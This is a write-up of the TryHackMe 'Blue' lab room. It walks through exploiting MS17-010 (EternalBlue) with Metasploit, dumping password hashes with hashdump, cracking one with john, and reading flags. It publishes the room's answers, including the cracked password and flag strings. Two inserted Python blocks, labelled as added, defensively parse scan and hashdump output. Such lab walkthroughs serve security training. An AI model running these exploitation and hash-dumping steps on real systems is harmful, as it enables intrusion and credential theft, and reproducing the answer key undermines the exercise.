Blue TryHackMe Writeup/Walkthrough

Shivam Taneja
5 min read, Sep 19, 2022

In this TryHackMe — Blue writeup we will learn how one small unpatched flaw in a system can get it hacked. The purpose of this blog is to demonstrate the steps to complete the Blue room: deploy and hack into a Windows machine, leveraging common misconfiguration issues.

TryHackMe — Blue Task 1: Recon

Basically, this is the information-gathering phase, in which we collect details about the open ports, the services running on them, the operating system and their versions.

Question 1: How many ports are open with a port number under 1000?

Solution: Step 1: Run the ‘nmap’ tool against the target IP to identify the open ports under 1000.

And I found 3 open ports under 1000.

Answer — 3

Question 2: What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

Solution: Step 1: Run Nmap’s vuln scripts against the target to find the vulnerability.

It is vulnerable to ‘SMBv1 server ms17-010’.

Answer — ms17-010
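The recon step above is also how a defender inventories unpatched hosts. The following added example (not code from the original writeup) parses the normal output of an `nmap --script vuln` sweep, counts open ports under 1000 per host and lists the hosts whose `smb-vuln-ms17-010` result is anything other than NOT VULNERABLE; the scan text is constructed to resemble real output and the IPs are placeholders.

```python
# Added example (not the writeup's code): triage `nmap --script vuln` output for
# hosts that report ms17-010. SAMPLE_NMAP_OUTPUT is constructed, not real scan data.
import re

SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.140.190
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
Host script results:
| smb-vuln-ms17-010:
|     State: VULNERABLE
|_    Risk factor: HIGH
Nmap scan report for 10.10.140.191
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb-vuln-ms17-010:
|_  State: NOT VULNERABLE
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(?:tcp|udp)\s+open\s")
SCRIPT_RE = re.compile(r"^\|_?\s*([a-z0-9]+(?:-[a-z0-9]+)+):")  # NSE script header line
STATE_RE = re.compile(r"State:\s+(NOT VULNERABLE|LIKELY VULNERABLE|VULNERABLE)")

def parse_scan(text):
    """Map each host to its open ports and its smb-vuln-ms17-010 State."""
    hosts, host, script = {}, None, None
    for line in text.splitlines():
        if m := HOST_RE.match(line):
            host, script = m.group(1), None
            hosts[host] = {"open_ports": [], "ms17_010": None}
        elif host and (m := PORT_RE.match(line)):
            hosts[host]["open_ports"].append(int(m.group(1)))
        elif host and line.startswith("|"):
            if m := SCRIPT_RE.match(line):
                script = m.group(1)          # which NSE script is reporting now
            if (m := STATE_RE.search(line)) and script == "smb-vuln-ms17-010":
                hosts[host]["ms17_010"] = m.group(1)
    return hosts

def ports_under(hosts, host, limit=1000):
    # Count of open ports below `limit` (the room's first recon question)
    return sum(1 for p in hosts[host]["open_ports"] if p < limit)

def needs_ms17_010_patch(hosts):
    # Patch list: every host whose reported State is not NOT VULNERABLE
    return sorted(h for h, d in hosts.items()
                  if d["ms17_010"] not in (None, "NOT VULNERABLE"))
```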

TryHackMe — Blue Task 2: Gain Access

This machine is vulnerable to the ms17-010 remote code execution vulnerability. We use Metasploit to exploit it.

Question 1: Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)

Solution: Step 1: Open Metasploit and search for an exploit against ‘SMBv1 server ms17-010’ by using the “search ms17-010” command.

I found these 4 exploits.

Step 2: Now I use the first exploit.

Answer — exploit/windows/smb/ms17_010_eternalblue

Question 2: Show options and set the one required value. What is the name of this value? (All caps for submission)

Solution: Step 1: Check the options by using the “show options” command.

Step 2: Type “set rhosts 10.10.140.190” (the target IP) and press Enter.

Answer — rhosts

Now it’s time to run the exploit by using the “run” command.

NOTE: If you see a FAIL message instead of a session, you need to type “set lhost 10.10.112.79” (your own IP) and press Enter.

After setting the correct lhost and rhosts, check again with the “show options” command to confirm them, then run the exploit again.

TryHackMe — Blue Task 3: Escalate

After getting a shell, background it with “ctrl+z” and upgrade it to meterpreter.

Question 1: If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in Metasploit. What is the name of the post-module we will use? (Exact path, similar to the exploit we previously selected)

Solution: Step 1: Use the command “search shell_to”.

Step 2: Type command “use 0” to use it.

Answer — post/multi/manage/shell_to_meterpreter

Question 2: Select this (use MODULE_PATH). Show options, what option are we required to change?

Solution: Step 1: Type the “sessions” command to list all the sessions I have.

Answer — Session

TryHackMe — Blue Task 4: Cracking

In this task, we obtain the hash of a user’s password and crack it.

Question 1: Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

Solution: Step 1: Now it is time to get a shell/cmd prompt by using the “shell” command.

Step 2: Now dump the hashes by using the “hashdump” command.

The only non-default user is Jon.

Answer — jon

Question 2: Copy this password hash to a file and research how to crack it. What is the cracked password?

Solution: Step 1: Now I save Jon’s password hash in a file (jon.txt) and then rename the file to jon.hash so that the cracker can decode the hash and recover the original password.

Step 2: Crack the hash by using the “john” tool with the “rockyou.txt” wordlist.

Answer — alqfna22
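The hashdump lines used in Task 4 follow the pwdump layout “user:RID:LM-hash:NT-hash:::”. The added example below (not code from the original writeup) parses that layout, answers the non-default-user question by RID, and performs the hygiene checks a defender would run on the same export: LM hashes still stored, empty passwords, and, because NT hashes are unsalted, accounts sharing a password. The sample lines and hash values are constructed, not the room’s real data.

```python
# Added example (not the writeup's code): audit hashdump/pwdump lines of the form
# "user:RID:LM-hash:NT-hash:::". SAMPLE_HASHDUMP is constructed; the hashes are fake.
NO_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"     # LM field when LM hashing is off
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password
FIRST_USER_RID = 1000   # RIDs below 1000 are built-in (Administrator=500, Guest=501)

SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
svc_backup:1001:deadbeefdeadbeefdeadbeefdeadbeef:0123456789abcdef0123456789abcdef:::
"""

def parse_hashdump(text):
    """One dict per well-formed line; blank or malformed lines are skipped."""
    accounts = []
    for raw in text.splitlines():
        parts = raw.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        accounts.append({"user": parts[0], "rid": int(parts[1]),
                         "lm": parts[2].lower(), "nt": parts[3].lower()})
    return accounts

def non_default_users(accounts):
    """The room's question: accounts that were created rather than built in."""
    return [a["user"] for a in accounts if a["rid"] >= FIRST_USER_RID]

def audit(accounts):
    """Per-account hygiene findings, keyed by user name."""
    by_nt = {}                                   # unsalted, so equal NT == equal password
    for a in accounts:
        by_nt.setdefault(a["nt"], []).append(a["user"])
    findings = {}
    for a in accounts:
        issues = []
        if a["lm"] != NO_LM_HASH:
            issues.append("LM hash present: LM hashing still enabled")
        if a["nt"] == EMPTY_NT_HASH:
            issues.append("empty password")
        others = [u for u in by_nt[a["nt"]] if u != a["user"]]
        if others:
            issues.append("same password as " + ", ".join(others))
        if issues:
            findings[a["user"]] = issues
    return findings
```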

TryHackMe — Blue Task 5: Find flags!

Once you have a shell, you need to find the flags hidden in different directories of the target machine.

Question 1: Flag1? This flag can be found at the system root.

Solution: Step 1: Check the hint and go to the ‘C:’ drive.

Step 2: List the directory by using the “dir” command; there I see the flag1.txt file.

Step 3: Read the flag1.txt file by using the “cat” command.

Flag 1: — flag{access_the_machine}

Question 2: Flag2? This flag can be found at the location where passwords are stored within Windows.

Solution: Step 1: Check the hint and go to the ‘Windows’ folder.

Step 2: Then go to the system32 folder by using the “cd system32” command.

Step 3: Then go into the config folder.

List the directory and you will see flag2.txt.

Flag 2: — flag{sam_database_elevated_access}


Question 3: flag3: This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.

Solution: Step 1: Type the command “search -f flag*.txt”.

Step 2: After that you see the flag3.txt file; then read it.

Flag 3: — flag{admin_documents_can_be_valuable}

Finally done….

NOTE: The EternalBlue vulnerability was very famous and many systems were compromised using it. Microsoft released a fix (MS17-010) to patch these vulnerabilities on the different affected operating systems.
